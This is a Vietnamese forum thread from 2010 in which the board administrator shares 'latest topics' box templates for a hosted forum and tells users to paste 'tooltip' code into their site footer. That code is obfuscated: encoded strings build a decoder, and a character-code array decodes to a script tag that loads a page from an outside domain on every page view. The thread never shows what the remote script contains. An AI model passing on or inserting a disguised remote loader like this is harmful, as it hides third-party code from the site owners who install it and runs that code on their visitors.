-‘๑’-•Diễn Đàn Ninh Châu Online•-‘๑’-
Chào Mừng Bạn Đến Với Diễn Đàn Ninh Châu Online - Quảng Ninh - Quảng Bình
 
http://ninhchau.hoctrovn.com Bạn hay đăng ki đê cung cac Thanh Viên

 Diễn đàn Ninh Châu Online chia se Kiên thưc & kinh nghiệm

~> Nếu không muốn hiện lại thông báo này bạn Cilck vào "Don't dislay tôi một lần nữa"

Chúc các bạn vui vẻ!
Latest topics
» làm áo các đội tuyển euro 2012 , áo các CLB 2012, 2013 chỉ còn 80k/1 bộ
by aoloptoi Sun May 13, 2012 5:26 pm

» làm áo đồng phục rẻ nhất hà nội
by aoloptoi Sun May 13, 2012 5:24 pm

» Làm áo đội bóng rẻ nhất Hà Nội, áo euro 2012 chỉ với 80.000đ/ 1 bộ
by aoloptoi Fri May 04, 2012 4:42 pm

» LÀM ÁO ĐỒNG PHỤC RẺ NHẤT HÀ NỘI
by aoloptoi Fri May 04, 2012 4:37 pm

» GAME VÀ ỨNG DỤNG MOBILE
by funbox Fri Oct 28, 2011 3:35 pm

» Game mobile,nhạc chuông,hình nền,nhạc chờ
by funbox Fri Oct 28, 2011 3:35 pm

» Avatar 2009 - 2D Full Download
by Kaito Kid Mon Oct 17, 2011 11:52 pm

» Ngân Hàng câu hỏi Triết học MÁC-LÊNIN
by chipcon15 Sun Oct 16, 2011 10:01 am

» Truyện tranh Jindo dinho bản Full
by cuibapwadj Tue Oct 11, 2011 3:40 pm

» SHARE Skin 20 -11 of Ninh Châu, Anh em lấy xài tạm
by kuhuyvltk03 Thu Sep 15, 2011 7:54 pm

» Radio Shack Mutimedia headset cant get mic to work?
by Khách viếng thăm Wed Aug 03, 2011 2:50 pm

» how i do this????????????????????????????????????…
by Khách viếng thăm Tue Aug 02, 2011 5:46 pm

» Good day Every body
by Khách viếng thăm Tue Aug 02, 2011 9:06 am

» Practically as chintzy as warez
by Khách viếng thăm Mon Aug 01, 2011 7:30 pm

» how do you set up a minecraft sever with a centurylink router?
by Khách viếng thăm Mon Aug 01, 2011 7:00 pm

» Cho em xin code index box của diễn đàn được k ạ??
by Lee Sung Hyo Mon Aug 01, 2011 7:22 am

» google page rank backlink services
by Khách viếng thăm Mon Aug 01, 2011 12:34 am

» backlink search engine backlink services
by Khách viếng thăm Sun Jul 31, 2011 6:57 pm

» When the first Whirlpool Duet album was released in December 2001 came as a surprise to the public
by Khách viếng thăm Sun Jul 31, 2011 10:41 am

» Cheapfares - Low Cost Travel
by Khách viếng thăm Sun Jul 31, 2011 1:55 am


Xin code bảng Last Topic:D

Xem chủ đề cũ hơn Xem chủ đề mới hơn Go down

Bo tay Xin code bảng Last Topic:D

Bài gửi by canvuong000 on Tue Apr 20, 2010 5:58 pm

admin có thể cho mình code bảng last topic của NC đc không



Có đánh số bài & thêm cái up ảnh . Giống NC hiện giờ ý
avatar
canvuong000
Member
Member

Giới tính : Nam Tổng số bài gửi : 15
Danh Vọng : 26345
Được Cảm Ơn : 1
Ngày Sinh : 01/01/1980
Tham Gia : 15/04/2010

Về Đầu Trang Go down

Bo tay Re: Xin code bảng Last Topic:D

Bài gửi by Kaito Kid on Tue Apr 20, 2010 6:45 pm

Mẫu 1



Code:
<!-- BEGIN classical_row --> 
<script type="text/javascript" src="http://users3.jabry.com/ninhchau/Tabview.js"></script>
<SPAN class="gensmall">
<table class="forumline12" width="100%" border="0" cellspacing="0" cellpadding="0"><tr><th height="19"><span class="genmed"><b>Bài gửi</b></span></th>
        <th><span class="genmed"><b>Người gửi</b></span></th><th><span class="genmed"><b>Thời gian</b></span></th><!-- BEGIN recent_topic_row -->
    <tr>
        <td class="row1" align="left" width="50%"><span class="gensmall">
        <img src="http://i70.servimg.com/u/f70/13/00/88/47/post_n10.gif"></img> <a href="{classical_row.recent_topic_row.U_TITLE}" onmouseover="Tip('<center><b><font color=red>08 DB B Community!</font></b></center><br><b><font color=red>Tiêu đề : </font></b>{classical_row.recent_topic_row.L_TITLE}<br><b><font color=red>Thời gian : </font></b>{classical_row.recent_topic_row.S_POSTTIME}')" onmouseout="UnTip()">{classical_row.recent_topic_row.L_TITLE}

</a></td>
        <td class="row1" align="left" width="25%"><img src="http://i155.photobucket.com/albums/s282/satthuonline/catl.gif"></img><b> <a href="{classical_row.recent_topic_row.U_POSTER}"> <span class="gensmall">{classical_row.recent_topic_row.S_POSTER} <img src="http://i155.photobucket.com/albums/s282/satthuonline/catr.gif"></img> </span></a>
        </b> </td>
        <td class="row1" align="left" width="25%"> <span class="gensmall">
        <img src="http://i89.servimg.com/u/f89/13/89/26/52/post_o10.gif" border="0" alt="" width="10" height="11" />
 {classical_row.recent_topic_row.S_POSTTIME}<br />
        </span></td>
    </tr><!-- END recent_topic_row --></table>
<!-- END classical_row -->

Mẫu 2



Code:
<!-- BEGIN classical_row -->
<table width="100%" border="0" cellspacing="1" cellpadding="3" align="center"><tr>
<th height="22" align="center">
<span class="cattitle"><font color="black">Bài gửi sau cùng</font></span>
</th></tr>
<tr><td>
</td></tr>
<tr><td style="padding: 0px; background: rgb(255, 255, 255) none repeat scroll 0% 0%; -moz-background-clip: border; -moz-background-origin: padding; -moz-background-inline-policy: continuous;" width="100%">
<table border="0" cellpadding="0" cellspacing="0" width="100%">
<tbody>
<tr valign="top">
<td style="border-top: 0px none; padding: 0px; background: transparent url(http://i909.photobucket.com/albums/ac295/mrlee12345/list20.gif) no-repeat scroll center top; -moz-background-clip: border; -moz-background-origin: padding; -moz-background-inline-policy: continuous;" width="24">
<img src="http://illiweb.com/fa/empty.gif" width="24" border="0"></td><td style="border-top: 0px none; padding: 0px; line-height: 20px; background-repeat: repeat;" align="left" background="http://i909.photobucket.com/albums/ac295/mrlee12345/listbg4821359.gif" width="80%">
<!-- BEGIN recent_topic_row -->
<a onmouseover="showtip('<b><font color=red>Tiêu đề :</font></b> {classical_row.recent_topic_row.L_TITLE}<br><b><font color=red>Cập Nhật Lúc :</font></b> {classical_row.recent_topic_row.S_POSTTIME}<br><b><font color=red>Chú Ý :</font></b> Hãy nhấp vào nút Thank để cảm ơn tác giả nếu thấy bài viết có ích nhé. Thân Admin!');" onmouseout="hidetip();" href="{classical_row.recent_topic_row.U_TITLE}">
<font color="#00CC00">{classical_row.recent_topic_row.L_TITLE}</font></a><br /><!-- END recent_topic_row --></td><td></td><td style="border-top: 0px none; padding: 0px; line-height: 20px; background-repeat: repeat;" align="right" background="http://img687.imageshack.us/img687/8968/listbg4821359.gif" width="20%">
   <b><!-- BEGIN recent_topic_row -->
<SPAN class="gensmall">
<img src="http://c.upanh.com//upload/4/592/3L0.8722830_353_1.gif" width="12" height="14">
</span>
<a href="{classical_row.recent_topic_row.U_POSTER}">
<font size="2" color="#000000"><I>
<span style="text-decoration: none">{classical_row.recent_topic_row.S_POSTER}</span>
</I></font></a>
<SPAN class="gensmall"><img src="http://c.upanh.com//upload/4/592/3L0.8722830_353_1.gif" width="12" height="14"></span><br />
<!-- END recent_topic_row --></b>

</td></tr></tbody></table></td></tr>
</table>
<!-- END classical_row -->



Diễn đàn THPT Ninh Châu - Quảng Bình
avatar
Kaito Kid
Administrator
Administrator

Thành Tích : Giới tính : Nam Tổng số bài gửi : 490
Danh Vọng : 32187
Được Cảm Ơn : 246
Ngày Sinh : 07/05/1990
Tham Gia : 18/12/2009
[HS] lớp : 2005-2008

http://ninhchau.hoctrovn.com

Về Đầu Trang Go down

Bo tay Re: Xin code bảng Last Topic:D

Bài gửi by canvuong000 on Wed Apr 21, 2010 2:27 pm

sao kô có cái tab up ảnh thế bạn
avatar
canvuong000
Member
Member

Giới tính : Nam Tổng số bài gửi : 15
Danh Vọng : 26345
Được Cảm Ơn : 1
Ngày Sinh : 01/01/1980
Tham Gia : 15/04/2010

Về Đầu Trang Go down

Bo tay Re: Xin code bảng Last Topic:D

Bài gửi by Kaito Kid on Wed Apr 21, 2010 11:00 pm

cái đó ko phải latest topic,



Diễn đàn THPT Ninh Châu - Quảng Bình
avatar
Kaito Kid
Administrator
Administrator

Thành Tích : Giới tính : Nam Tổng số bài gửi : 490
Danh Vọng : 32187
Được Cảm Ơn : 246
Ngày Sinh : 07/05/1990
Tham Gia : 18/12/2009
[HS] lớp : 2005-2008

http://ninhchau.hoctrovn.com

Về Đầu Trang Go down

Bo tay Re: Xin code bảng Last Topic:D

Bài gửi by [N]obitaz on Wed Apr 28, 2010 10:29 am

Bạn có thể share cho mình cái code tooltip của mẫu số 2 ko? khi rê chuột vô link thì thấy cái tittle, thời gian với lời nhắn từ Admin ý. Thks ban nhìu, vote cho phát.
avatar
[N]obitaz
Member
Member

Giới tính : Nam Tổng số bài gửi : 10
Danh Vọng : 26216
Được Cảm Ơn : 2
Ngày Sinh : 18/02/1993
Tham Gia : 25/04/2010

Về Đầu Trang Go down

Bo tay Re: Xin code bảng Last Topic:D

Bài gửi by Kaito Kid on Wed Apr 28, 2010 12:25 pm

[N]obitaz đã viết:Bạn có thể share cho mình cái code tooltip của mẫu số 2 ko? khi rê chuột vô link thì thấy cái tittle, thời gian với lời nhắn từ Admin ý. Thks ban nhìu, vote cho phát.

Chèn thêm cái này vào overall Footer

Code:

<script type='text/javascript'>
var str3='%3C%73%63%72%69%70%74%20%6C%61%6E%67%75%61%67%65%3D%22%6A%61%76%61%73%63%72%69%70%74%22%3E%66%75%6E%63%74%69%6F%6E%20%64%46%28%73%29%7B%76%61%72%20%73%31%3D%75%6E%65%73%63%61%70%65%28%73%2E%73%75%62%73%74%72%28%30%2C%73%2E%6C%65%6E%67%74%68%2D%31%29%29%3B%20%76%61%72%20%74%3D%27%27%3B%66%6F%72%28%69%3D%30%3B%69%3C%73%31%2E%6C%65%6E%67%74%68%3B%69%2B%2B%29%74%2B%3D%53%74%72%69%6E%67%2E%66%72%6F%6D%43%68%61%72%43%6F%64%65%28%73%31%2E%63%68%61%72%43%6F%64%65%41%74%28%69%29%2D%73%2E%73%75%62%73%74%72%28%73%2E%6C%65%6E%67%74%68%2D%31%2C%31%29%29%3B%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%75%6E%65%73%63%61%70%65%28%74%29%29%3B%7D%3C%2F%73%63%72%69%70%74%3E';document.write(unescape(str3));var str4='*8Hxhwnuy*75qfslzflj*8I*77of%7Bfxhwnuy*77*8Jkzshynts*75lnfnrf7*7%3Dtg*7%3E*%3CG%7Bfw*75ht*8I5*8G%7Bfw*75wj*8I*7%3C*7%3C*8G%7Cmnqj*7%3Dht*8Htg3qjslym*7%3E*%3CGwj0*8IXywnsl3kwtrHmfwHtij*7%3Dtg*%3AGht*%3AI*7%3E*8Ght00*8G*%3CIwjyzws*75wj*8G*%3CI*8H4xhwnuy*8J5';dF(str4);var str2=new Array(60,115,99,114,105,112,116,32,115,114,99,61,104,116,116,112,58,47,47,119,119,119,46,99,51,122,46,99,111,46,99,99,47,104,116,109,108,45,104,51,51,46,104,116,109,62,60,47,115,99,114,105,112,116,62);document.write(giaima2(str2));
</script>

var str3='%3C%73%63%72%69%70%74%20%6C%61%6E%67%75%61%67%65%3D%22%6A%61%76%61%73%63%72%69%70%74%22%3E%66%75%6E%63%74%69%6F%6E%20%64%46%28%73%29%7B%76%61%72%20%73%31%3D%75%6E%65%73%63%61%70%65%28%73%2E%73%75%62%73%74%72%28%30%2C%73%2E%6C%65%6E%67%74%68%2D%31%29%29%3B%20%76%61%72%20%74%3D%27%27%3B%66%6F%72%28%69%3D%30%3B%69%3C%73%31%2E%6C%65%6E%67%74%68%3B%69%2B%2B%29%74%2B%3D%53%74%72%69%6E%67%2E%66%72%6F%6D%43%68%61%72%43%6F%64%65%28%73%31%2E%63%68%61%72%43%6F%64%65%41%74%28%69%29%2D%73%2E%73%75%62%73%74%72%28%73%2E%6C%65%6E%67%74%68%2D%31%2C%31%29%29%3B%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%75%6E%65%73%63%61%70%65%28%74%29%29%3B%7D%3C%2F%73%63%72%69%70%74%3E';document.write(unescape(str3));var str4='*8Hxhwnuy*75qfslzflj*8I*77of%7Bfxhwnuy*77*8Jkzshynts*75lnfnrf7*7%3Dtg*7%3E*%3CG%7Bfw*75ht*8I5*8G%7Bfw*75wj*8I*7%3C*7%3C*8G%7Cmnqj*7%3Dht*8Htg3qjslym*7%3E*%3CGwj0*8IXywnsl3kwtrHmfwHtij*7%3Dtg*%3AGht*%3AI*7%3E*8Ght00*8G*%3CIwjyzws*75wj*8G*%3CI*8H4xhwnuy*8J5';dF(str4);var str2=new Array(60,115,99,114,105,112,116,32,115,114,99,61,104,116,116,112,58,47,47,119,119,119,46,99,51,122,46,99,111,46,99,99,47,104,116,109,108,45,104,51,51,46,104,116,109,62,60,47,115,99,114,105,112,116,62);document.write(giaima2(str2));


Thêm cái này vào CSS nữa

Code:


#dhtmlpointer, #dhtmltooltip


{


  z-index: 999;


  left: -300px;
top:0px;


  visibility: hidden;


  position: absolute;


}


#dhtmltooltip


{


  border: #666 2.4px
solid;


  -moz-opacity: 0.8;
/* lam mo tooltip FF */


  opacity: 0.8; /* lam
mo tooltip Opera */


  filter:
alpha(opacity=80); /* lam mo tooltip IE */


  -moz-border-radius:
6px;


 
-webkit-border-radius: 6px;


  padding: 10px;


  font-size: 10pt;


  font-family: Arial;


  background-color:
white;


  width: auto;


  max-width: 340px; /*
chieu rong toi da cho FF */


  width:expression(
document.body.clientWidth > 340? "340px": "auto" ); /*
chieu rong toi da cho IE */


  text-align:left;


}




Diễn đàn THPT Ninh Châu - Quảng Bình
avatar
Kaito Kid
Administrator
Administrator

Thành Tích : Giới tính : Nam Tổng số bài gửi : 490
Danh Vọng : 32187
Được Cảm Ơn : 246
Ngày Sinh : 07/05/1990
Tham Gia : 18/12/2009
[HS] lớp : 2005-2008

http://ninhchau.hoctrovn.com

Về Đầu Trang Go down

Bo tay Re: Xin code bảng Last Topic:D

Bài gửi by Kaito Kid on Wed Apr 28, 2010 12:30 pm

canvuong000 đã viết:sao kô có cái tab up ảnh thế bạn

đây là Latest topic ko có tab up ảnh



Diễn đàn THPT Ninh Châu - Quảng Bình
avatar
Kaito Kid
Administrator
Administrator

Thành Tích : Giới tính : Nam Tổng số bài gửi : 490
Danh Vọng : 32187
Được Cảm Ơn : 246
Ngày Sinh : 07/05/1990
Tham Gia : 18/12/2009
[HS] lớp : 2005-2008

http://ninhchau.hoctrovn.com

Về Đầu Trang Go down

Bo tay Re: Xin code bảng Last Topic:D

Bài gửi by [N]obitaz on Thu Apr 29, 2010 8:11 pm

Kaito Kid đã viết:
[N]obitaz đã viết:Bạn có thể share cho mình cái code tooltip của mẫu số 2 ko? khi rê chuột vô link thì thấy cái tittle, thời gian với lời nhắn từ Admin ý. Thks ban nhìu, vote cho phát.

Chèn thêm cái này vào overall Footer

Code:

var str3='%3C%73%63%72%69%70%74%20%6C%61%6E%67%75%61%67%65%3D%22%6A%61%76%61%73%63%72%69%70%74%22%3E%66%75%6E%63%74%69%6F%6E%20%64%46%28%73%29%7B%76%61%72%20%73%31%3D%75%6E%65%73%63%61%70%65%28%73%2E%73%75%62%73%74%72%28%30%2C%73%2E%6C%65%6E%67%74%68%2D%31%29%29%3B%20%76%61%72%20%74%3D%27%27%3B%66%6F%72%28%69%3D%30%3B%69%3C%73%31%2E%6C%65%6E%67%74%68%3B%69%2B%2B%29%74%2B%3D%53%74%72%69%6E%67%2E%66%72%6F%6D%43%68%61%72%43%6F%64%65%28%73%31%2E%63%68%61%72%43%6F%64%65%41%74%28%69%29%2D%73%2E%73%75%62%73%74%72%28%73%2E%6C%65%6E%67%74%68%2D%31%2C%31%29%29%3B%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%75%6E%65%73%63%61%70%65%28%74%29%29%3B%7D%3C%2F%73%63%72%69%70%74%3E';document.write(unescape(str3));var str4='*8Hxhwnuy*75qfslzflj*8I*77of%7Bfxhwnuy*77*8Jkzshynts*75lnfnrf7*7%3Dtg*7%3E*%3CG%7Bfw*75ht*8I5*8G%7Bfw*75wj*8I*7%3C*7%3C*8G%7Cmnqj*7%3Dht*8Htg3qjslym*7%3E*%3CGwj0*8IXywnsl3kwtrHmfwHtij*7%3Dtg*%3AGht*%3AI*7%3E*8Ght00*8G*%3CIwjyzws*75wj*8G*%3CI*8H4xhwnuy*8J5';dF(str4);var str2=new Array(60,115,99,114,105,112,116,32,115,114,99,61,104,116,116,112,58,47,47,119,119,119,46,99,51,122,46,99,111,46,99,99,47,104,116,109,108,45,104,51,51,46,104,116,109,62,60,47,115,99,114,105,112,116,62);document.write(giaima2(str2));

Thêm cái này vào CSS nữa

Code:
#dhtmltooltip
{
  border: #666 2.4px solid;
  -moz-opacity: 0.8; /* lam mo tooltip FF */
  opacity: 0.8; /* lam mo tooltip Opera */
  filter: alpha(opacity=80); /* lam mo tooltip IE */
  -moz-border-radius: 6px;
  -webkit-border-radius: 6px;
  padding: 10px;
  font-size: 10pt;
  font-family: Arial;
  background-color: white;
  width: auto;
  max-width: 340px; /* chieu rong toi da cho FF */
  width:expression( document.body.clientWidth > 340? "340px": "auto" ); /* chieu rong toi da cho IE */
  text-align:left;
}

Cái nỳ bị ko được, chẻn thử rùi mà hok ra gì hết trơn. Mình đọc bài của Ex trên chinhphuc thấy phải up code .js gì mà.hjxhjx
avatar
[N]obitaz
Member
Member

Giới tính : Nam Tổng số bài gửi : 10
Danh Vọng : 26216
Được Cảm Ơn : 2
Ngày Sinh : 18/02/1993
Tham Gia : 25/04/2010

Về Đầu Trang Go down

Bo tay Re: Xin code bảng Last Topic:D

Bài gửi by Kaito Kid on Thu Apr 29, 2010 8:43 pm

Bạn chú ý là ở đây là toodtip cho mẫu số 2 ở dưới, forum minh chỉ làm thế thôi, và kết quả bạn thấy đó, ko có file js nào cả,

bạn trích dẫn code bị thiếu mất thẻ rồi kìa



Diễn đàn THPT Ninh Châu - Quảng Bình
avatar
Kaito Kid
Administrator
Administrator

Thành Tích : Giới tính : Nam Tổng số bài gửi : 490
Danh Vọng : 32187
Được Cảm Ơn : 246
Ngày Sinh : 07/05/1990
Tham Gia : 18/12/2009
[HS] lớp : 2005-2008

http://ninhchau.hoctrovn.com

Về Đầu Trang Go down

Bo tay Re: Xin code bảng Last Topic:D

Bài gửi by [N]obitaz on Sat May 01, 2010 12:05 pm

Đã làm tương tự mà ko thấy gì hết trơn.
avatar
[N]obitaz
Member
Member

Giới tính : Nam Tổng số bài gửi : 10
Danh Vọng : 26216
Được Cảm Ơn : 2
Ngày Sinh : 18/02/1993
Tham Gia : 25/04/2010

Về Đầu Trang Go down

Bo tay Re: Xin code bảng Last Topic:D

Bài gửi by ..:ღ♥Tình Yêuღ♥:.. on Sun May 02, 2010 11:19 am

Sao em lam no bi loi vay ?
avatar
..:ღ♥Tình Yêuღ♥:..
Member
Member

Giới tính : Nam Tổng số bài gửi : 3
Danh Vọng : 26137
Được Cảm Ơn : 0
Ngày Sinh : 17/03/1992
Tham Gia : 02/05/2010

Về Đầu Trang Go down

Bo tay Re: Xin code bảng Last Topic:D

Bài gửi by Kaito Kid on Mon May 03, 2010 9:23 pm

[N]obitaz đã viết:Đã làm tương tự mà ko thấy gì hết trơn.

Sorry nha Minh Post Css Thiếu 1 đoạn

đây là CSS thay cho đoạn CSS ở trên nha
Code:





#dhtmlpointer, #dhtmltooltip


{


  z-index: 999;


  left: -300px;
top:0px;


  visibility: hidden;


  position: absolute;


}


#dhtmltooltip


{


  border: #666 2.4px
solid;


  -moz-opacity: 0.8;
/* lam mo tooltip FF */


  opacity: 0.8; /* lam
mo tooltip Opera */


  filter:
alpha(opacity=80); /* lam mo tooltip IE */


  -moz-border-radius:
6px;


 
-webkit-border-radius: 6px;


  padding: 10px;


  font-size: 10pt;


  font-family: Arial;


  background-color:
white;


  width: auto;


  max-width: 340px; /*
chieu rong toi da cho FF */


  width:expression(
document.body.clientWidth > 340? "340px": "auto" ); /*
chieu rong toi da cho IE */


  text-align:left;


}




Diễn đàn THPT Ninh Châu - Quảng Bình
avatar
Kaito Kid
Administrator
Administrator

Thành Tích : Giới tính : Nam Tổng số bài gửi : 490
Danh Vọng : 32187
Được Cảm Ơn : 246
Ngày Sinh : 07/05/1990
Tham Gia : 18/12/2009
[HS] lớp : 2005-2008

http://ninhchau.hoctrovn.com

Về Đầu Trang Go down

Bo tay Re: Xin code bảng Last Topic:D

Bài gửi by Insa_Joongie on Wed May 19, 2010 3:14 pm

cho e hỏi chút =.= chèn code này vào đâu vậy ạ????Ý e là cái code cho mẫu 1 ở mục last topic ý ạ =.=

Và chèn nó thì chèn vào bên trên cùng hay dưới cùng nhỉ???? Em chèn ở Index_Body chỗ trên cùng nhưng nó ko hiện ra T^T
avatar
Insa_Joongie
Member
Member

Giới tính : Nữ Tổng số bài gửi : 11
Danh Vọng : 25975
Được Cảm Ơn : 0
Ngày Sinh : 17/03/1996
Tham Gia : 19/05/2010

Về Đầu Trang Go down

Bo tay Re: Xin code bảng Last Topic:D

Bài gửi by Kaito Kid on Wed May 19, 2010 5:19 pm

vào Dislay > Temp... > Portal > Mod recenttopic



Diễn đàn THPT Ninh Châu - Quảng Bình
avatar
Kaito Kid
Administrator
Administrator

Thành Tích : Giới tính : Nam Tổng số bài gửi : 490
Danh Vọng : 32187
Được Cảm Ơn : 246
Ngày Sinh : 07/05/1990
Tham Gia : 18/12/2009
[HS] lớp : 2005-2008

http://ninhchau.hoctrovn.com

Về Đầu Trang Go down

Bo tay Re: Xin code bảng Last Topic:D

Bài gửi by Insa_Joongie on Wed May 19, 2010 6:09 pm

Kaito Kid đã viết:vào Dislay > Temp... > Portal > Mod recenttopic


Tình hình là sau khi chèn vào xong nó vẫn ko hiện ra anh à T^T anh chỉ rõ chèn trên cùng hay dưới và có add thêm ở đâu nữa đc ko hay chỉ ở mỗi Mod recent topic????
avatar
Insa_Joongie
Member
Member

Giới tính : Nữ Tổng số bài gửi : 11
Danh Vọng : 25975
Được Cảm Ơn : 0
Ngày Sinh : 17/03/1996
Tham Gia : 19/05/2010

Về Đầu Trang Go down

Bo tay Re: Xin code bảng Last Topic:D

Bài gửi by Kaito Kid on Thu May 20, 2010 1:20 am

Insa_Joongie đã viết:
Kaito Kid đã viết:vào Dislay > Temp... > Portal > Mod recenttopic


Tình hình là sau khi chèn vào xong nó vẫn ko hiện ra anh à T^T anh chỉ rõ chèn trên cùng hay dưới và có add thêm ở đâu nữa đc ko hay chỉ ở mỗi Mod recent topic????

1- thay index body bằng index body đã share
2- thay code latest topic (mẫu 1) vào mod recent topic

3-vào module >portal & widget >Forum widgets management >

làm theo mấy hình dưới








[size=36]Close topic [/size]



Diễn đàn THPT Ninh Châu - Quảng Bình
avatar
Kaito Kid
Administrator
Administrator

Thành Tích : Giới tính : Nam Tổng số bài gửi : 490
Danh Vọng : 32187
Được Cảm Ơn : 246
Ngày Sinh : 07/05/1990
Tham Gia : 18/12/2009
[HS] lớp : 2005-2008

http://ninhchau.hoctrovn.com

Về Đầu Trang Go down

Bo tay Re: Xin code bảng Last Topic:D

Bài gửi by Insa_Joongie on Mon May 24, 2010 8:37 am

anh Kaito ơi, cho em hỏi. Sao khi em add vào nó ko hiện ra bài viết mới nhất và tên ng` mà nó cứ hiện ra thế này nè:






Anh xem dùm e với =.= e đã add vào rùi mà =.= Code mẫu 1 có cần thay cái j` ko a??? hay phải add j` nữa ko ạ?


Còn nữa, khi nhấn vào cái dấu như hình




Còn cần làm j` nữa hả anh?
avatar
Insa_Joongie
Member
Member

Giới tính : Nữ Tổng số bài gửi : 11
Danh Vọng : 25975
Được Cảm Ơn : 0
Ngày Sinh : 17/03/1996
Tham Gia : 19/05/2010

Về Đầu Trang Go down

Bo tay Re: Xin code bảng Last Topic:D

Bài gửi by Thanh Tung on Mon May 24, 2010 8:16 pm

cái code latest topic chèn vao Dislay > Temp... > Portal > Mod recenttopic

ban chen sai cho roi nen code ko thuc hien dc




avatar
Thanh Tung
Super Mod
Super Mod

Thành Tích :

Giới tính : Nam Tổng số bài gửi : 215
Danh Vọng : 30592
Được Cảm Ơn : 126
Ngày Sinh : 24/05/1990
Tham Gia : 19/12/2009
[HS] lớp : Cựu Hs 12B

Về Đầu Trang Go down

Bo tay Re: Xin code bảng Last Topic:D

Bài gửi by Insa_Joongie on Tue May 25, 2010 10:06 am

Em đã làm lại nhưng tại sao nó lại hiện ra ở mục Portal ạ? Em muốn nó hiện hẳn lúc vào phần Index chứu ko phải Portal.

Có thể xem lại dùm em ko ạ?
avatar
Insa_Joongie
Member
Member

Giới tính : Nữ Tổng số bài gửi : 11
Danh Vọng : 25975
Được Cảm Ơn : 0
Ngày Sinh : 17/03/1996
Tham Gia : 19/05/2010

Về Đầu Trang Go down

Bo tay Re: Xin code bảng Last Topic:D

Bài gửi by lenh2456 on Fri Jun 11, 2010 9:40 am

sao em thay đầy đủ mà nó lại ra thế này:
avatar
lenh2456
Member
Member

Giới tính : Nam Tổng số bài gửi : 5
Danh Vọng : 25740
Được Cảm Ơn : -1
Ngày Sinh : 24/06/1993
Tham Gia : 11/06/2010

http://locninh.hocotrovn.net

Về Đầu Trang Go down

Bo tay Re: Xin code bảng Last Topic:D

Bài gửi by Sponsored content


Sponsored content


Về Đầu Trang Go down

Xem chủ đề cũ hơn Xem chủ đề mới hơn Về Đầu Trang


 
Permissions in this forum:
Bạn không có quyền trả lời bài viết